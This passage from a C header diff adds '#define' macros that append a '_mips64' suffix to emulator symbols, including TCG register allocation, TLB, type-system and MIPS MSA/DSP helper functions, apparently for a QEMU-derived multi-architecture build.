tcg_reg_alloc tcg_reg_alloc_mips64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mips64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_mips64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mips64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mips64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_mips64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_mips64 +#define tcg_reg_free tcg_reg_free_mips64 +#define tcg_reg_sync tcg_reg_sync_mips64 +#define tcg_set_frame tcg_set_frame_mips64 +#define tcg_set_nop tcg_set_nop_mips64 +#define tcg_swap_cond tcg_swap_cond_mips64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mips64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mips64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mips64 +#define tcg_target_const_match tcg_target_const_match_mips64 +#define tcg_target_init tcg_target_init_mips64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mips64 
+#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mips64 +#define tcg_temp_alloc tcg_temp_alloc_mips64 +#define tcg_temp_free_i32 tcg_temp_free_i32_mips64 +#define tcg_temp_free_i64 tcg_temp_free_i64_mips64 +#define tcg_temp_free_internal tcg_temp_free_internal_mips64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mips64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mips64 +#define tcg_temp_new_i32 tcg_temp_new_i32_mips64 +#define tcg_temp_new_i64 tcg_temp_new_i64_mips64 +#define tcg_temp_new_internal tcg_temp_new_internal_mips64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mips64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mips64 +#define tdb_hash tdb_hash_mips64 +#define teecr_write teecr_write_mips64 +#define teehbr_access teehbr_access_mips64 +#define temp_allocate_frame temp_allocate_frame_mips64 +#define temp_dead temp_dead_mips64 +#define temps_are_copies temps_are_copies_mips64 +#define temp_save temp_save_mips64 +#define temp_sync temp_sync_mips64 +#define tgen_arithi tgen_arithi_mips64 +#define tgen_arithr tgen_arithr_mips64 +#define thumb2_logic_op thumb2_logic_op_mips64 +#define ti925t_initfn ti925t_initfn_mips64 +#define tlb_add_large_page tlb_add_large_page_mips64 +#define tlb_flush_entry tlb_flush_entry_mips64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mips64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mips64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mips64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mips64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mips64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_mips64 +#define tlbiall_is_write tlbiall_is_write_mips64 +#define tlbiall_write tlbiall_write_mips64 +#define tlbiasid_is_write tlbiasid_is_write_mips64 +#define tlbiasid_write tlbiasid_write_mips64 +#define tlbimvaa_is_write tlbimvaa_is_write_mips64 +#define tlbimvaa_write tlbimvaa_write_mips64 +#define tlbimva_is_write 
tlbimva_is_write_mips64 +#define tlbimva_write tlbimva_write_mips64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_mips64 +#define tlb_protect_code tlb_protect_code_mips64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_mips64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mips64 +#define tlb_set_dirty tlb_set_dirty_mips64 +#define tlb_set_dirty1 tlb_set_dirty1_mips64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mips64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_mips64 +#define token_get_type token_get_type_mips64 +#define token_get_value token_get_value_mips64 +#define token_is_escape token_is_escape_mips64 +#define token_is_keyword token_is_keyword_mips64 +#define token_is_operator token_is_operator_mips64 +#define tokens_append_from_iter tokens_append_from_iter_mips64 +#define to_qiv to_qiv_mips64 +#define to_qov to_qov_mips64 +#define tosa_init tosa_init_mips64 +#define tosa_machine_init tosa_machine_init_mips64 +#define tswap32 tswap32_mips64 +#define tswap64 tswap64_mips64 +#define type_class_get_size type_class_get_size_mips64 +#define type_get_by_name type_get_by_name_mips64 +#define type_get_parent type_get_parent_mips64 +#define type_has_parent type_has_parent_mips64 +#define type_initialize type_initialize_mips64 +#define type_initialize_interface type_initialize_interface_mips64 +#define type_is_ancestor type_is_ancestor_mips64 +#define type_new type_new_mips64 +#define type_object_get_size type_object_get_size_mips64 +#define type_register_internal type_register_internal_mips64 +#define type_table_add type_table_add_mips64 +#define type_table_get type_table_get_mips64 +#define type_table_lookup type_table_lookup_mips64 +#define uint16_to_float32 uint16_to_float32_mips64 +#define uint16_to_float64 uint16_to_float64_mips64 +#define uint32_to_float32 uint32_to_float32_mips64 +#define uint32_to_float64 uint32_to_float64_mips64 +#define uint64_to_float128 uint64_to_float128_mips64 +#define uint64_to_float32 
uint64_to_float32_mips64 +#define uint64_to_float64 uint64_to_float64_mips64 +#define unassigned_io_ops unassigned_io_ops_mips64 +#define unassigned_io_read unassigned_io_read_mips64 +#define unassigned_io_write unassigned_io_write_mips64 +#define unassigned_mem_accepts unassigned_mem_accepts_mips64 +#define unassigned_mem_ops unassigned_mem_ops_mips64 +#define unassigned_mem_read unassigned_mem_read_mips64 +#define unassigned_mem_write unassigned_mem_write_mips64 +#define update_spsel update_spsel_mips64 +#define v6_cp_reginfo v6_cp_reginfo_mips64 +#define v6k_cp_reginfo v6k_cp_reginfo_mips64 +#define v7_cp_reginfo v7_cp_reginfo_mips64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_mips64 +#define v7m_pop v7m_pop_mips64 +#define v7m_push v7m_push_mips64 +#define v8_cp_reginfo v8_cp_reginfo_mips64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mips64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mips64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mips64 +#define vapa_cp_reginfo vapa_cp_reginfo_mips64 +#define vbar_write vbar_write_mips64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mips64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mips64 +#define vfp_get_fpcr vfp_get_fpcr_mips64 +#define vfp_get_fpscr vfp_get_fpscr_mips64 +#define vfp_get_fpsr vfp_get_fpsr_mips64 +#define vfp_reg_offset vfp_reg_offset_mips64 +#define vfp_set_fpcr vfp_set_fpcr_mips64 +#define vfp_set_fpscr vfp_set_fpscr_mips64 +#define vfp_set_fpsr vfp_set_fpsr_mips64 +#define visit_end_implicit_struct visit_end_implicit_struct_mips64 +#define visit_end_list visit_end_list_mips64 +#define visit_end_struct visit_end_struct_mips64 +#define visit_end_union visit_end_union_mips64 +#define visit_get_next_type visit_get_next_type_mips64 +#define visit_next_list visit_next_list_mips64 +#define visit_optional visit_optional_mips64 +#define visit_start_implicit_struct visit_start_implicit_struct_mips64 +#define visit_start_list visit_start_list_mips64 +#define 
visit_start_struct visit_start_struct_mips64 +#define visit_start_union visit_start_union_mips64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_mips64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mips64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mips64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mips64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_mips64 +#define vmsa_ttbr_write vmsa_ttbr_write_mips64 +#define write_cpustate_to_list write_cpustate_to_list_mips64 +#define write_list_to_cpustate write_list_to_cpustate_mips64 +#define write_raw_cp_reg write_raw_cp_reg_mips64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_mips64 +#define x86_op_defs x86_op_defs_mips64 +#define xpsr_read xpsr_read_mips64 +#define xpsr_write xpsr_write_mips64 +#define xscale_cpar_write xscale_cpar_write_mips64 +#define xscale_cp_reginfo xscale_cp_reginfo_mips64 +#define cpu_mips_exec cpu_mips_exec_mips64 +#define cpu_mips_get_random cpu_mips_get_random_mips64 +#define cpu_mips_get_count cpu_mips_get_count_mips64 +#define cpu_mips_store_count cpu_mips_store_count_mips64 +#define cpu_mips_store_compare cpu_mips_store_compare_mips64 +#define cpu_mips_start_count cpu_mips_start_count_mips64 +#define cpu_mips_stop_count cpu_mips_stop_count_mips64 +#define mips_machine_init mips_machine_init_mips64 +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mips64 +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mips64 +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mips64 +#define mips_cpu_register_types mips_cpu_register_types_mips64 +#define cpu_mips_init cpu_mips_init_mips64 +#define cpu_state_reset cpu_state_reset_mips64 +#define helper_msa_andi_b helper_msa_andi_b_mips64 +#define helper_msa_ori_b helper_msa_ori_b_mips64 +#define helper_msa_nori_b helper_msa_nori_b_mips64 +#define helper_msa_xori_b helper_msa_xori_b_mips64 +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64 +#define helper_msa_bmzi_b helper_msa_bmzi_b_mips64 +#define helper_msa_bseli_b 
helper_msa_bseli_b_mips64 +#define helper_msa_shf_df helper_msa_shf_df_mips64 +#define helper_msa_and_v helper_msa_and_v_mips64 +#define helper_msa_or_v helper_msa_or_v_mips64 +#define helper_msa_nor_v helper_msa_nor_v_mips64 +#define helper_msa_xor_v helper_msa_xor_v_mips64 +#define helper_msa_bmnz_v helper_msa_bmnz_v_mips64 +#define helper_msa_bmz_v helper_msa_bmz_v_mips64 +#define helper_msa_bsel_v helper_msa_bsel_v_mips64 +#define helper_msa_addvi_df helper_msa_addvi_df_mips64 +#define helper_msa_subvi_df helper_msa_subvi_df_mips64 +#define helper_msa_ceqi_df helper_msa_ceqi_df_mips64 +#define helper_msa_clei_s_df helper_msa_clei_s_df_mips64 +#define helper_msa_clei_u_df helper_msa_clei_u_df_mips64 +#define helper_msa_clti_s_df helper_msa_clti_s_df_mips64 +#define helper_msa_clti_u_df helper_msa_clti_u_df_mips64 +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64 +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64 +#define helper_msa_mini_s_df helper_msa_mini_s_df_mips64 +#define helper_msa_mini_u_df helper_msa_mini_u_df_mips64 +#define helper_msa_ldi_df helper_msa_ldi_df_mips64 +#define helper_msa_slli_df helper_msa_slli_df_mips64 +#define helper_msa_srai_df helper_msa_srai_df_mips64 +#define helper_msa_srli_df helper_msa_srli_df_mips64 +#define helper_msa_bclri_df helper_msa_bclri_df_mips64 +#define helper_msa_bseti_df helper_msa_bseti_df_mips64 +#define helper_msa_bnegi_df helper_msa_bnegi_df_mips64 +#define helper_msa_sat_s_df helper_msa_sat_s_df_mips64 +#define helper_msa_sat_u_df helper_msa_sat_u_df_mips64 +#define helper_msa_srari_df helper_msa_srari_df_mips64 +#define helper_msa_srlri_df helper_msa_srlri_df_mips64 +#define helper_msa_binsli_df helper_msa_binsli_df_mips64 +#define helper_msa_binsri_df helper_msa_binsri_df_mips64 +#define helper_msa_sll_df helper_msa_sll_df_mips64 +#define helper_msa_sra_df helper_msa_sra_df_mips64 +#define helper_msa_srl_df helper_msa_srl_df_mips64 +#define helper_msa_bclr_df helper_msa_bclr_df_mips64 
+#define helper_msa_bset_df helper_msa_bset_df_mips64 +#define helper_msa_bneg_df helper_msa_bneg_df_mips64 +#define helper_msa_addv_df helper_msa_addv_df_mips64 +#define helper_msa_subv_df helper_msa_subv_df_mips64 +#define helper_msa_max_s_df helper_msa_max_s_df_mips64 +#define helper_msa_max_u_df helper_msa_max_u_df_mips64 +#define helper_msa_min_s_df helper_msa_min_s_df_mips64 +#define helper_msa_min_u_df helper_msa_min_u_df_mips64 +#define helper_msa_max_a_df helper_msa_max_a_df_mips64 +#define helper_msa_min_a_df helper_msa_min_a_df_mips64 +#define helper_msa_ceq_df helper_msa_ceq_df_mips64 +#define helper_msa_clt_s_df helper_msa_clt_s_df_mips64 +#define helper_msa_clt_u_df helper_msa_clt_u_df_mips64 +#define helper_msa_cle_s_df helper_msa_cle_s_df_mips64 +#define helper_msa_cle_u_df helper_msa_cle_u_df_mips64 +#define helper_msa_add_a_df helper_msa_add_a_df_mips64 +#define helper_msa_adds_a_df helper_msa_adds_a_df_mips64 +#define helper_msa_adds_s_df helper_msa_adds_s_df_mips64 +#define helper_msa_adds_u_df helper_msa_adds_u_df_mips64 +#define helper_msa_ave_s_df helper_msa_ave_s_df_mips64 +#define helper_msa_ave_u_df helper_msa_ave_u_df_mips64 +#define helper_msa_aver_s_df helper_msa_aver_s_df_mips64 +#define helper_msa_aver_u_df helper_msa_aver_u_df_mips64 +#define helper_msa_subs_s_df helper_msa_subs_s_df_mips64 +#define helper_msa_subs_u_df helper_msa_subs_u_df_mips64 +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64 +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64 +#define helper_msa_asub_s_df helper_msa_asub_s_df_mips64 +#define helper_msa_asub_u_df helper_msa_asub_u_df_mips64 +#define helper_msa_mulv_df helper_msa_mulv_df_mips64 +#define helper_msa_div_s_df helper_msa_div_s_df_mips64 +#define helper_msa_div_u_df helper_msa_div_u_df_mips64 +#define helper_msa_mod_s_df helper_msa_mod_s_df_mips64 +#define helper_msa_mod_u_df helper_msa_mod_u_df_mips64 +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64 +#define 
helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64 +#define helper_msa_srar_df helper_msa_srar_df_mips64 +#define helper_msa_srlr_df helper_msa_srlr_df_mips64 +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mips64 +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mips64 +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mips64 +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mips64 +#define helper_msa_mul_q_df helper_msa_mul_q_df_mips64 +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64 +#define helper_msa_sld_df helper_msa_sld_df_mips64 +#define helper_msa_maddv_df helper_msa_maddv_df_mips64 +#define helper_msa_msubv_df helper_msa_msubv_df_mips64 +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64 +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64 +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64 +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64 +#define helper_msa_binsl_df helper_msa_binsl_df_mips64 +#define helper_msa_binsr_df helper_msa_binsr_df_mips64 +#define helper_msa_madd_q_df helper_msa_madd_q_df_mips64 +#define helper_msa_msub_q_df helper_msa_msub_q_df_mips64 +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64 +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64 +#define helper_msa_splat_df helper_msa_splat_df_mips64 +#define helper_msa_pckev_df helper_msa_pckev_df_mips64 +#define helper_msa_pckod_df helper_msa_pckod_df_mips64 +#define helper_msa_ilvl_df helper_msa_ilvl_df_mips64 +#define helper_msa_ilvr_df helper_msa_ilvr_df_mips64 +#define helper_msa_ilvev_df helper_msa_ilvev_df_mips64 +#define helper_msa_ilvod_df helper_msa_ilvod_df_mips64 +#define helper_msa_vshf_df helper_msa_vshf_df_mips64 +#define helper_msa_sldi_df helper_msa_sldi_df_mips64 +#define helper_msa_splati_df helper_msa_splati_df_mips64 +#define helper_msa_copy_s_df helper_msa_copy_s_df_mips64 +#define helper_msa_copy_u_df helper_msa_copy_u_df_mips64 +#define helper_msa_insert_df helper_msa_insert_df_mips64 +#define 
helper_msa_insve_df helper_msa_insve_df_mips64 +#define helper_msa_ctcmsa helper_msa_ctcmsa_mips64 +#define helper_msa_cfcmsa helper_msa_cfcmsa_mips64 +#define helper_msa_move_v helper_msa_move_v_mips64 +#define helper_msa_fill_df helper_msa_fill_df_mips64 +#define helper_msa_nlzc_df helper_msa_nlzc_df_mips64 +#define helper_msa_nloc_df helper_msa_nloc_df_mips64 +#define helper_msa_pcnt_df helper_msa_pcnt_df_mips64 +#define helper_msa_fcaf_df helper_msa_fcaf_df_mips64 +#define helper_msa_fcun_df helper_msa_fcun_df_mips64 +#define helper_msa_fceq_df helper_msa_fceq_df_mips64 +#define helper_msa_fcueq_df helper_msa_fcueq_df_mips64 +#define helper_msa_fclt_df helper_msa_fclt_df_mips64 +#define helper_msa_fcult_df helper_msa_fcult_df_mips64 +#define helper_msa_fcle_df helper_msa_fcle_df_mips64 +#define helper_msa_fcule_df helper_msa_fcule_df_mips64 +#define helper_msa_fsaf_df helper_msa_fsaf_df_mips64 +#define helper_msa_fsun_df helper_msa_fsun_df_mips64 +#define helper_msa_fseq_df helper_msa_fseq_df_mips64 +#define helper_msa_fsueq_df helper_msa_fsueq_df_mips64 +#define helper_msa_fslt_df helper_msa_fslt_df_mips64 +#define helper_msa_fsult_df helper_msa_fsult_df_mips64 +#define helper_msa_fsle_df helper_msa_fsle_df_mips64 +#define helper_msa_fsule_df helper_msa_fsule_df_mips64 +#define helper_msa_fcor_df helper_msa_fcor_df_mips64 +#define helper_msa_fcune_df helper_msa_fcune_df_mips64 +#define helper_msa_fcne_df helper_msa_fcne_df_mips64 +#define helper_msa_fsor_df helper_msa_fsor_df_mips64 +#define helper_msa_fsune_df helper_msa_fsune_df_mips64 +#define helper_msa_fsne_df helper_msa_fsne_df_mips64 +#define helper_msa_fadd_df helper_msa_fadd_df_mips64 +#define helper_msa_fsub_df helper_msa_fsub_df_mips64 +#define helper_msa_fmul_df helper_msa_fmul_df_mips64 +#define helper_msa_fdiv_df helper_msa_fdiv_df_mips64 +#define helper_msa_fmadd_df helper_msa_fmadd_df_mips64 +#define helper_msa_fmsub_df helper_msa_fmsub_df_mips64 +#define helper_msa_fexp2_df 
helper_msa_fexp2_df_mips64 +#define helper_msa_fexdo_df helper_msa_fexdo_df_mips64 +#define helper_msa_ftq_df helper_msa_ftq_df_mips64 +#define helper_msa_fmin_df helper_msa_fmin_df_mips64 +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64 +#define helper_msa_fmax_df helper_msa_fmax_df_mips64 +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64 +#define helper_msa_fclass_df helper_msa_fclass_df_mips64 +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64 +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64 +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64 +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64 +#define helper_msa_frcp_df helper_msa_frcp_df_mips64 +#define helper_msa_frint_df helper_msa_frint_df_mips64 +#define helper_msa_flog2_df helper_msa_flog2_df_mips64 +#define helper_msa_fexupl_df helper_msa_fexupl_df_mips64 +#define helper_msa_fexupr_df helper_msa_fexupr_df_mips64 +#define helper_msa_ffql_df helper_msa_ffql_df_mips64 +#define helper_msa_ffqr_df helper_msa_ffqr_df_mips64 +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64 +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64 +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64 +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64 +#define helper_paddsb helper_paddsb_mips64 +#define helper_paddusb helper_paddusb_mips64 +#define helper_paddsh helper_paddsh_mips64 +#define helper_paddush helper_paddush_mips64 +#define helper_paddb helper_paddb_mips64 +#define helper_paddh helper_paddh_mips64 +#define helper_paddw helper_paddw_mips64 +#define helper_psubsb helper_psubsb_mips64 +#define helper_psubusb helper_psubusb_mips64 +#define helper_psubsh helper_psubsh_mips64 +#define helper_psubush helper_psubush_mips64 +#define helper_psubb helper_psubb_mips64 +#define helper_psubh helper_psubh_mips64 +#define helper_psubw helper_psubw_mips64 +#define helper_pshufh helper_pshufh_mips64 +#define helper_packsswh helper_packsswh_mips64 +#define 
helper_packsshb helper_packsshb_mips64 +#define helper_packushb helper_packushb_mips64 +#define helper_punpcklwd helper_punpcklwd_mips64 +#define helper_punpckhwd helper_punpckhwd_mips64 +#define helper_punpcklhw helper_punpcklhw_mips64 +#define helper_punpckhhw helper_punpckhhw_mips64 +#define helper_punpcklbh helper_punpcklbh_mips64 +#define helper_punpckhbh helper_punpckhbh_mips64 +#define helper_pavgh helper_pavgh_mips64 +#define helper_pavgb helper_pavgb_mips64 +#define helper_pmaxsh helper_pmaxsh_mips64 +#define helper_pminsh helper_pminsh_mips64 +#define helper_pmaxub helper_pmaxub_mips64 +#define helper_pminub helper_pminub_mips64 +#define helper_pcmpeqw helper_pcmpeqw_mips64 +#define helper_pcmpgtw helper_pcmpgtw_mips64 +#define helper_pcmpeqh helper_pcmpeqh_mips64 +#define helper_pcmpgth helper_pcmpgth_mips64 +#define helper_pcmpeqb helper_pcmpeqb_mips64 +#define helper_pcmpgtb helper_pcmpgtb_mips64 +#define helper_psllw helper_psllw_mips64 +#define helper_psrlw helper_psrlw_mips64 +#define helper_psraw helper_psraw_mips64 +#define helper_psllh helper_psllh_mips64 +#define helper_psrlh helper_psrlh_mips64 +#define helper_psrah helper_psrah_mips64 +#define helper_pmullh helper_pmullh_mips64 +#define helper_pmulhh helper_pmulhh_mips64 +#define helper_pmulhuh helper_pmulhuh_mips64 +#define helper_pmaddhw helper_pmaddhw_mips64 +#define helper_pasubub helper_pasubub_mips64 +#define helper_biadd helper_biadd_mips64 +#define helper_pmovmskb helper_pmovmskb_mips64 +#define helper_absq_s_ph helper_absq_s_ph_mips64 +#define helper_absq_s_qb helper_absq_s_qb_mips64 +#define helper_absq_s_w helper_absq_s_w_mips64 +#define helper_addqh_ph helper_addqh_ph_mips64 +#define helper_addqh_r_ph helper_addqh_r_ph_mips64 +#define helper_addqh_r_w helper_addqh_r_w_mips64 +#define helper_addqh_w helper_addqh_w_mips64 +#define helper_adduh_qb helper_adduh_qb_mips64 +#define helper_adduh_r_qb helper_adduh_r_qb_mips64 +#define helper_subqh_ph helper_subqh_ph_mips64 +#define 
helper_subqh_r_ph helper_subqh_r_ph_mips64 +#define helper_subqh_r_w helper_subqh_r_w_mips64 +#define helper_subqh_w helper_subqh_w_mips64 +#define helper_addq_ph helper_addq_ph_mips64 +#define helper_addq_s_ph helper_addq_s_ph_mips64 +#define helper_addq_s_w helper_addq_s_w_mips64 +#define helper_addu_ph helper_addu_ph_mips64 +#define helper_addu_qb helper_addu_qb_mips64 +#define helper_addu_s_ph helper_addu_s_ph_mips64 +#define helper_addu_s_qb helper_addu_s_qb_mips64 +#define helper_subq_ph helper_subq_ph_mips64 +#define helper_subq_s_ph helper_subq_s_ph_mips64 +#define helper_subq_s_w helper_subq_s_w_mips64 +#define helper_subu_ph helper_subu_ph_mips64 +#define helper_subu_qb helper_subu_qb_mips64 +#define helper_subu_s_ph helper_subu_s_ph_mips64 +#define helper_subu_s_qb helper_subu_s_qb_mips64 +#define helper_subuh_qb helper_subuh_qb_mips64 +#define helper_subuh_r_qb helper_subuh_r_qb_mips64 +#define helper_addsc helper_addsc_mips64 +#define helper_addwc helper_addwc_mips64 +#define helper_modsub helper_modsub_mips64 +#define helper_raddu_w_qb helper_raddu_w_qb_mips64 +#define helper_precr_qb_ph helper_precr_qb_ph_mips64 +#define helper_precrq_qb_ph helper_precrq_qb_ph_mips64 +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64 +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64 +#define helper_precrq_ph_w helper_precrq_ph_w_mips64 +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64 +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64 +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64 +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64 +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64 +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64 +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64 +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64 +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64 +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64 +#define 
helper_shll_qb helper_shll_qb_mips64 +#define helper_shrl_qb helper_shrl_qb_mips64 +#define helper_shra_qb helper_shra_qb_mips64 +#define helper_shra_r_qb helper_shra_r_qb_mips64 +#define helper_shll_ph helper_shll_ph_mips64 +#define helper_shll_s_ph helper_shll_s_ph_mips64 +#define helper_shll_s_w helper_shll_s_w_mips64 +#define helper_shra_r_w helper_shra_r_w_mips64 +#define helper_shrl_ph helper_shrl_ph_mips64 +#define helper_shra_ph helper_shra_ph_mips64 +#define helper_shra_r_ph helper_shra_r_ph_mips64 +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64 +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64 +#define helper_mulq_rs_ph helper_mulq_rs_ph_mips64 +#define helper_mul_ph helper_mul_ph_mips64 +#define helper_mul_s_ph helper_mul_s_ph_mips64 +#define helper_mulq_s_ph helper_mulq_s_ph_mips64 +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64 +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64 +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64 +#define helper_mulsa_w_ph helper_mulsa_w_ph_mips64 +#define helper_dpau_h_qbl helper_dpau_h_qbl_mips64 +#define helper_dpau_h_qbr helper_dpau_h_qbr_mips64 +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64 +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64 +#define helper_dpa_w_ph helper_dpa_w_ph_mips64 +#define helper_dpax_w_ph helper_dpax_w_ph_mips64 +#define helper_dps_w_ph helper_dps_w_ph_mips64 +#define helper_dpsx_w_ph helper_dpsx_w_ph_mips64 +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64 +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64 +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64 +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64 +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64 +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64 +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64 +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64 +#define helper_maq_s_w_phl helper_maq_s_w_phl_mips64 +#define helper_maq_s_w_phr 
helper_maq_s_w_phr_mips64 +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64 +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64 +#define helper_mulq_s_w helper_mulq_s_w_mips64 +#define helper_mulq_rs_w helper_mulq_rs_w_mips64 +#define helper_bitrev helper_bitrev_mips64 +#define helper_insv helper_insv_mips64 +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64 +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64 +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64 +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64 +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64 +#define helper_cmpu_le_qb helper_cmpu_le_qb_mips64 +#define helper_cmp_eq_ph helper_cmp_eq_ph_mips64 +#define helper_cmp_lt_ph helper_cmp_lt_ph_mips64 +#define helper_cmp_le_ph helper_cmp_le_ph_mips64 +#define helper_pick_qb helper_pick_qb_mips64 +#define helper_pick_ph helper_pick_ph_mips64 +#define helper_packrl_ph helper_packrl_ph_mips64 +#define helper_extr_w helper_extr_w_mips64 +#define helper_extr_r_w helper_extr_r_w_mips64 +#define helper_extr_rs_w helper_extr_rs_w_mips64 +#define helper_extr_s_h helper_extr_s_h_mips64 +#define helper_extp helper_extp_mips64 +#define helper_extpdp helper_extpdp_mips64 +#define helper_shilo helper_shilo_mips64 +#define helper_mthlip helper_mthlip_mips64 +#define cpu_wrdsp cpu_wrdsp_mips64 +#define helper_wrdsp helper_wrdsp_mips64 +#define cpu_rddsp cpu_rddsp_mips64 +#define helper_rddsp helper_rddsp_mips64 +#define helper_raise_exception_err helper_raise_exception_err_mips64 +#define helper_clo helper_clo_mips64 +#define helper_clz helper_clz_mips64 +#define helper_muls helper_muls_mips64 +#define helper_mulsu helper_mulsu_mips64 +#define helper_macc helper_macc_mips64 +#define helper_macchi helper_macchi_mips64 +#define helper_maccu helper_maccu_mips64 +#define helper_macchiu helper_macchiu_mips64 +#define helper_msac helper_msac_mips64 +#define helper_msachi helper_msachi_mips64 +#define helper_msacu helper_msacu_mips64 +#define helper_msachiu 
